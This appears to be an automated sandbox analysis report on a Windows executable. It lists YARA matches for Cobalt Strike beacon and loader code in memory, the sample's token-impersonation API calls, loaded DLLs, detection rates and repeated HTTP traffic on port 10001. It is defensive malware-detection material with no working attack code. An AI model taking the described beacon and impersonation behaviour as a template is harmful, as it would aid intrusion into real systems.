            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Code function: 0_2_0099FE24 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_0099FE24
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Code function: 0_2_009A6C98 OpenProcess,TerminateProcess,GetLastError,CloseHandle,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,CloseHandle,OpenProcess,ProcessIdToSessionId,CloseHandle,Process32Next,CloseHandle,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,CloseHandle,htonl,htonl,OpenProcess,GetLastError,OpenProcessToken,GetLastError,ImpersonateLoggedOnUser,GetLastError,DuplicateTokenEx,GetLastError,ImpersonateLoggedOnUser,GetLastError,CloseHandle,CloseHandle,0_2_009A6C98
            Source: 7kSftA4Eoh.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: 7kSftA4Eoh.exe ReversingLabs: Detection: 89%
            Source: 7kSftA4Eoh.exe Virustotal: Detection: 79%
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

            Data Obfuscation

            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Unpacked PE file: 0.2.7kSftA4Eoh.exe.990000.1.unpack
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Code function: 0_2_009BC124 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryExW,GetLastError,LoadLibraryExW,0_2_009BC124
            Source: 7kSftA4Eoh.exe Static PE information: section name: .xdata
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Code function: 0_2_009C515C push 0000006Ah; retf 0_2_009C5174
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Code function: 0_2_000D0128 push eax; ret 0_2_000D0364
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Code function: 0_2_000D0294 push eax; ret 0_2_000D0364
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Code function: 0_2_000D02EB push eax; ret 0_2_000D0364
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Code function: 0_2_03549B65 push cs; retf 0_2_03549B66
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Code function: 0_2_03566A42 push ebp; iretd 0_2_03566A43
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Code function: 0_2_03566A62 push ebp; iretd 0_2_03566A63
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Code function: 0_2_03566A8B push ebp; iretd 0_2_03566A8C
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Code function: 0_2_0354B19F push ebp; iretd 0_2_0354B1A0
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe Code function: 0_2_035497A4 push edi; iretd 0_2_035497A5

            Hooking and other Techniques for Hiding and Protection

            Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 10001
            Source: unknown Network traffic detected: HTTP traffic on port 10001 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49832
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49835
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49838
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49844
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49845
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49849
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49851
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49852
            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49853
            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49857
            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49858
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49860
            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49861
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49862
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49864
            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49865
            Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49866
            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49867
            Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49868
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49872
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49872
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49874
            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49876
            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49877
            Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49878
            Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49879
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49880
            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49881
            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49882
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49884
            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49885
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49888
            Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49889
            Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49890
            Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49891
            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49892
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49894
            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49895
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49896
            Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49897
            Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49898
            Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49899
            Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49900
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49900
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49900
            Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49901
            Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49902
            Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49903
            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49904
            Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49905
            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49906
            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49907
            Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49908
            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49909
            Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49910
            Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49911
            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49912
            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49913
            Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49914
            Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49915
            Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49916
            Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49917
            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49918
            Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49919
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49920
            Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49921
            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49922
            Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49923
            Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49924
            Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49925
            Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49926
